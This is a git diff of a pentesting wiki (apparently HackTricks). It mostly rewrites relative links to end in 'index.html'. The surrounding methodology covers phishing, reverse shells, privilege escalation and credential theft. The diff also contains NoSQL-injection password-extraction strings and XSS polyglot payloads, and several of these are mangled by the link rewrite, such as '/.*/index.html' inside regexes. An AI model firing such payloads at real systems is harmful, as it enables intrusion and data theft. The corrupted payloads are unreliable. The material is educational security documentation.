I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/index.html#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**

38
src/generic-methodologies-and-resources/pentesting-methodology.md
View File

@ -13,14 +13,14 @@ _Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieran
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications.md).
### 1 - [Discovering hosts inside the network ](pentesting-network/index.html#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
### 1 - [Discovering hosts inside the network ](pentesting-network/index.html#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/index.html)
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
> [!NOTE]
> Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
### **2-** [**Having Fun with the network**](pentesting-network/index.html) **(Internal)**
**This section only applies if you are performing an internal test.**\
Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/index.html#sniffing).
@ -39,7 +39,7 @@ If there isn't any fancy exploit for any running service, you should look for **
**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports).
**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\
**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/index.html) **part (as it is the most extensive one).**\
Also, a small guide on how to[ **find known vulnerabilities in software**](../generic-hacking/search-exploits.md) can be found here.
**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
@ -52,13 +52,13 @@ There are also several tools that can perform **automatic vulnerabilities assess
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](../generic-hacking/brute-force.md)**.**
### 6- [Phishing](phishing-methodology/)
### 6- [Phishing](phishing-methodology/index.html)
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/index.html):
### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/)
### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/index.html)
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/).
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/index.html).
Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\
@ -68,7 +68,7 @@ If you have troubles with the shell, you can find here a small **compilation of
- [**Linux**](../linux-hardening/useful-linux-commands.md)
- [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
- [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
- [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/index.html)
### **9 -** [**Exfiltration**](../generic-hacking/exfiltration.md)
@ -79,19 +79,19 @@ You will probably need to **extract some data from the victim** or even **introd
#### **10.1- Local Privesc**
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/index.html) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/index.html)**.**\
You should also check this pages about how does **Windows work**:
- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
- How does [**NTLM works**](../windows-hardening/ntlm/)
- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/index.html)
- How does [**NTLM works**](../windows-hardening/ntlm/index.html)
- How to [**steal credentials**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows
- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/index.html)
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
#### **10.2- Domain Privesc**
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/index.html). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
### 11 - POST
@ -111,20 +111,20 @@ TODO: Complete persistence Post in Windows & Linux
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](../generic-hacking/tunneling-and-port-forwarding.md).\
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/index.html). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
Check also the page about [**NTLM**](../windows-hardening/ntlm/index.html), it could be very useful to pivot on Windows environments..
### MORE
#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
#### [Android Applications](../mobile-pentesting/android-app-pentesting/index.html)
#### **Exploiting**
- [**Basic Linux Exploiting**](broken-reference/)
- [**Basic Linux Exploiting**](broken-reference/index.html)
- [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html)
#### [**Basic Python**](python/)
#### [**Basic Python**](python/index.html)
#### **Crypto tricks**

2
src/generic-methodologies-and-resources/python/README.md
View File

@ -7,7 +7,7 @@
- [**Pyscript hacking tricks**](pyscript.md)
- [**Python deserializations**](../../pentesting-web/deserialization/index.html#python)
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/)
- [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/index.html)
- [**Basic python web requests syntax**](web-requests.md)
- [**Basic python syntax and libraries**](basic-python.md)

2
src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md
View File

@ -15,7 +15,7 @@ app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'
```
In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/).
In this case it's possible to access this object just using any gadget to **access global objects** from the [**Bypass Python sandboxes page**](bypass-python-sandboxes/index.html).
In the case where **the vulnerability is in a different python file**, you need a gadget to traverse files to get to the main one to **access the global object `app.secret_key`** to change the Flask secret key and be able to [**escalate privileges** knowing this key](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign).

2
src/linux-hardening/linux-privilege-escalation-checklist.md
View File

@ -72,7 +72,7 @@
- [ ] Generic users/groups **enumeration**
- [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
- [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/) you belong to?
- [ ] Can you [**escalate privileges thanks to a group**](privilege-escalation/interesting-groups-linux-pe/index.html) you belong to?
- [ ] **Clipboard** data?
- [ ] Password Policy?
- [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without a password.

4
src/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
View File

@ -90,7 +90,7 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
## RCE in NodeJS Debugger/Inspector
> [!NOTE]
> If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
> If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/index.html)
Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):
@ -108,7 +108,7 @@ In this section I will just list interesting things I find people have used to e
### Parameter Injection via Deep Links
In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI.
In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://index.html) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI.
It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things.

2
src/macos-hardening/macos-security-and-privilege-escalation/README.md
View File

@ -95,7 +95,7 @@ Therefore, an attacker that wants to successfully compromise a macOS machine wil
These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**.
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/index.html#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses).
## macOS Traditional Privilege Escalation

4
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md
View File

@ -17,11 +17,11 @@ The entitlement **`com.apple.rootless.install`** allows to **bypass SIP**. Check
### **`com.apple.system-task-ports` (previously called `task_for_pid-allow`)**
This entitlement allows to get the **task port for any** process, except the kernel. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
This entitlement allows to get the **task port for any** process, except the kernel. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/index.html).
### `com.apple.security.get-task-allow`
This entitlement allows other processes with the **`com.apple.security.cs.debugger`** entitlement to get the task port of the process run by the binary with this entitlement and **inject code on it**. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/).
This entitlement allows other processes with the **`com.apple.security.cs.debugger`** entitlement to get the task port of the process run by the binary with this entitlement and **inject code on it**. Check [**this for more info**](../macos-proces-abuse/macos-ipc-inter-process-communication/index.html).
### `com.apple.security.cs.debugger`

2
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View File

@ -212,7 +212,7 @@ However, there are some files whose signature won't be checked, these have the k
</dict>
<key>rules2</key>
...
<key>^(.*/)?\.DS_Store$</key>
<key>^(.*/index.html)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>

2
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -439,7 +439,7 @@ It's important to also search for common web vulnerabilities within the applicat
**You can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\
If you want to pentest Android applications you need to know how to use Frida.
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/)
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)

2
src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md
View File

@ -194,7 +194,7 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID
## References
- [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/)
- [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](ttps://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/index.html)
- [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0052/)
- [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0053/)
- [https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/](https://mas.owasp.org/MASTG/techniques/ios/MASTG-TECH-0054/)

2
src/network-services-pentesting/pentesting-kerberos-88/README.md
View File

@ -17,7 +17,7 @@ PORT STATE SERVICE
88/tcp open kerberos-sec
```
### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/)**.**
### **To learn how to abuse Kerberos you should read the post about** [**Active Directory**](../../windows-hardening/active-directory-methodology/index.html)**.**
## More

2
src/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
View File

@ -35,7 +35,7 @@ Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE,
- `X-Original-URL: /admin/console`
- `X-Rewrite-URL: /admin/console`
- If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
- If the page is **behind a proxy**, maybe it's the proxy the one preventing you you to access the private information. Try abusing [**HTTP Request Smuggling**](../../pentesting-web/http-request-smuggling/index.html) **or** [**hop-by-hop headers**](../../pentesting-web/abusing-hop-by-hop-headers.md)**.**
- Fuzz [**special HTTP headers**](special-http-headers.md) looking for different response.
- **Fuzz special HTTP headers** while fuzzing **HTTP Methods**.
- **Remove the Host header** and maybe you will be able to bypass the protection.

22
src/network-services-pentesting/pentesting-web/README.md
View File

@ -73,9 +73,9 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
- [**Artifactory**](artifactory-hacking-guide.md)
- [**Buckets**](buckets/)
- [**Buckets**](buckets/index.html)
- [**CGI**](cgi.md)
- [**Drupal**](drupal/)
- [**Drupal**](drupal/index.html)
- [**Flask**](flask.md)
- [**Git**](git.md)
- [**Golang**](golang.md)
@ -90,17 +90,17 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
- [**Laravel**](laravel.md)
- [**Moodle**](moodle.md)
- [**Nginx**](nginx.md)
- [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/)
- [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/index.html)
- [**Python**](python.md)
- [**Spring Actuators**](spring-actuators.md)
- [**Symphony**](symphony.md)
- [**Tomcat**](tomcat/)
- [**Tomcat**](tomcat/index.html)
- [**VMWare**](vmware-esx-vcenter....md)
- [**Web API Pentesting**](web-api-pentesting.md)
- [**WebDav**](put-method-webdav.md)
- [**Werkzeug**](werkzeug.md)
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._\
If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks (and let me know!).
@ -140,11 +140,11 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi
If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **or** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
```bash
cmsmap [-f W] -F -d <URL>
@ -289,7 +289,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
- If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
- **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html).
### Special findings

2
src/network-services-pentesting/pentesting-web/flask.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/index.html)**.**
## Cookies

2
src/network-services-pentesting/pentesting-web/graphql.md
View File

@ -465,7 +465,7 @@ However, note that the new default cookie value of the `samesite` flag of Chrome
Note that it's usually possible to send the **query** **request** also as a **GET** **request and the CSRF token might not being validated in a GET request.**
Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
Also, abusing a [**XS-Search**](../../pentesting-web/xs-search/index.html) **attack** might be possible to exfiltrate content from the GraphQL endpoint abusing the credentials of the user.
For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).

4
src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
View File

@ -178,7 +178,7 @@ Check:
- The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
- When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
- [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
- [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/index.html)
### password_hash/password_verify
@ -228,7 +228,7 @@ php-ssrf.md
&#xNAN;**\`ls\`;**\
**shell_exec("ls");**
[Check this for more useful PHP functions](php-useful-functions-disable_functions-open_basedir-bypass/)
[Check this for more useful PHP functions](php-useful-functions-disable_functions-open_basedir-bypass/index.html)
### **RCE via** **preg_replace()**

2
src/pentesting-web/browser-extension-pentesting-methodology/README.md
View File

@ -698,7 +698,7 @@ Even though Browser Extensions have a **limited attack surface**, some of them m
- [ ] **Limit** as much as possible the **`web_accessible_resources`**, even empty if possible.
- [ ] If **`web_accessible_resources`** is not none, check for [**ClickJacking**](browext-clickjacking.md)
- [ ] If any **communication** occurs from the **extension** to the **web page**, [**check for XSS**](browext-xss-example.md) **vulnerabilities** caused in the communication.
- [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/)**.**
- [ ] If Post Messages are used, check for [**Post Message vulnerabilities**](../postmessage-vulnerabilities/index.html)**.**
- [ ] If the **Content Script access DOM details**, check that they **aren't introducing a XSS** if they get **modified** by the web
- [ ] Make a special emphasis if this communication is also involved in the **Content Script -> Background script communication**
- [ ] If the background script is communicating via **native messaging** check the communication is secure and sanitized

2
src/pentesting-web/client-side-template-injection-csti.md
View File

@ -4,7 +4,7 @@
## Summary
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/index.html) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
**Testing** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter expects **a template** and will execute it. For example, with a payload like `{{ 7-7 }}`, if the app is **vulnerable** you will see a `0`, and if not, you will see the original: `{{ 7-7 }}`

4
src/pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -411,7 +411,7 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/index.html).
Moreover, if the **page is loading a script using a relative path** (like `<script src="/js/app.js">`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use an httpS url in the base.
@ -491,7 +491,7 @@ Therefore, the best solution is to ensure that the website does not have any ope
### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection/).
Read [how here](../dangling-markup-html-scriptless-injection/index.html).
### 'unsafe-inline'; img-src \*; via XSS

2
src/pentesting-web/csrf-cross-site-request-forgery.md
View File

@ -205,7 +205,7 @@ Therefore, if a GET request is being limited, you could just **send a HEAD reque
### **Exfiltrating CSRF Token**
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/index.html#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/index.html#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/index.html) vulnerability.
### **GET using HTML tags**

4
src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
View File

@ -4,10 +4,10 @@
## Resume
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/index.html)but you can **inject some HTML tags**.\
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/index.html) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
## Main Applications

2
src/pentesting-web/file-upload/README.md
View File

@ -178,7 +178,7 @@ Note that **another option** you may be thinking of to bypass this check is to m
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**

10
src/pentesting-web/nosql-injection.md
View File

@ -80,7 +80,7 @@ in JSON
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/.*/index.html)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
@ -145,10 +145,10 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
' && this.password.match(/.*/index.html)//+%00
' && this.passwordzz.match(/.*/index.html)//+%00
'%20%26%26%20this.password.match(/.*/index.html)//+%00
'%20%26%26%20this.passwordzz.match(/.*/index.html)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);

12
src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
View File

@ -47,7 +47,7 @@ javascript:alert(1)
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
